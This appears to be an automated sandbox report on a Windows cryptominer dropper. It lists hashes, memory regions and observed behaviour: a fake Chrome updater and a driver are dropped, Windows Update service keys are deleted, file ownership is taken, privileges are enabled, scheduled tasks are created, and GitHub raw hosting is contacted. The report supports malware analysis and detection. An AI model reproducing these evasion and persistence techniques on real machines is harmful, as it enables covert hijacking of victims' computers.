memory/2064-79-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1044-81-0x0000000001C30000-0x0000000001C31000-memory.dmp

memory/1044-80-0x000000001B920000-0x000000001B930000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 6cf293cb4d80be23433eecf74ddb5503
SHA1 24fe4752df102c2ef492954d6b046cb5512ad408
SHA256 b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA512 0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

memory/1700-83-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1700-85-0x00000155015A0000-0x00000155015B0000-memory.dmp

memory/1700-84-0x00000155015A0000-0x00000155015B0000-memory.dmp

C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 2238871af228384f4b8cdc65117ba9f1
SHA1 2a200725f1f32e5a12546aa7fd7a8c5906757bd1
SHA256 daa246f73567ad176e744abdb82d991dd8cffe0e2d847d2feefeb84f7fa5f882
SHA512 1833d508fdbe2b8722b787bfc0c1848a5bcdeb7ec01e94158d78e9e6ceb397a2515d88bb8ca4ec1a810263fc900b5b1ea1d788aa103967ed61436e617fab47bf

memory/1700-105-0x000001551A000000-0x000001551A01C000-memory.dmp

memory/1700-106-0x000001551A020000-0x000001551A0D5000-memory.dmp

memory/1700-107-0x000001551A0E0000-0x000001551A0EA000-memory.dmp

memory/1700-108-0x000001551A250000-0x000001551A26C000-memory.dmp

memory/1700-109-0x000001551A230000-0x000001551A23A000-memory.dmp

memory/1700-110-0x000001551A290000-0x000001551A2AA000-memory.dmp

memory/1700-111-0x000001551A240000-0x000001551A248000-memory.dmp

memory/1700-112-0x000001551A270000-0x000001551A276000-memory.dmp

memory/1700-113-0x000001551A280000-0x000001551A28A000-memory.dmp

memory/1700-114-0x00000155015A0000-0x00000155015B0000-memory.dmp

memory/1700-116-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1044-117-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/1044-118-0x000000001B920000-0x000000001B930000-memory.dmp

memory/1044-119-0x0000000002820000-0x0000000002826000-memory.dmp

memory/3636-120-0x000001E8D68D0000-0x000001E8D68D7000-memory.dmp

memory/3636-122-0x000001E8D70C0000-0x000001E8D70C6000-memory.dmp

memory/3636-123-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3636-125-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-126-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-124-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/1044-128-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3636-129-0x00007FFB24270000-0x00007FFB24D31000-memory.dmp

memory/3636-130-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-131-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

memory/3636-132-0x000001E8D70E0000-0x000001E8D70F0000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-19 18:47

Reported

2024-03-19 18:52

Platform

win11-20240221-en

Max time kernel

147s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe"

Signatures

Modifies security service

evasion
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 C:\Windows\system32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo C:\Windows\system32\reg.exe N/A

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A

Stops running service(s)

evasion

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\Temp\miner2.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A
N/A N/A C:\Windows\system32\icacls.exe N/A
N/A N/A C:\Windows\system32\takeown.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log C:\Program Files\Google\Chrome\updater.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Libs\WR64.sys C:\Program Files\Google\Chrome\updater.exe N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Program Files\Google\Chrome\updater.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Program Files\Google\Chrome\updater.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Program Files\Google\Chrome\updater.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Temp\miner2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2648 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 2648 wrote to memory of 3228 N/A C:\Users\Admin\AppData\Local\Temp\6ed222056c77a040d7efc411380ebc607a089181b11a126a11eefbc64b0b3e28.exe C:\Windows\Temp\miner2.exe
PID 3228 wrote to memory of 3540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 3540 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3228 wrote to memory of 3412 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3228 wrote to memory of 3412 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3228 wrote to memory of 4400 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3228 wrote to memory of 4400 N/A C:\Windows\Temp\miner2.exe C:\Windows\System32\cmd.exe
PID 3412 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 2736 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4400 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 436 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 4576 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 1180 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 1180 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 2748 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 2748 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 4400 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 1132 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 1908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 1908 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\sc.exe
PID 3412 wrote to memory of 4404 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4404 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4400 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 1848 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 2864 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 2864 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4624 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 3680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 3680 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 4400 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 4400 wrote to memory of 4660 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\powercfg.exe
PID 3412 wrote to memory of 1816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 1816 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3412 wrote to memory of 4596 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\takeown.exe
PID 3412 wrote to memory of 1196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3412 wrote to memory of 1196 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\icacls.exe
PID 3412 wrote to memory of 4648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4648 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4904 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4372 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 4700 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\reg.exe
PID 3412 wrote to memory of 928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 928 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 3412 wrote to memory of 4756 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
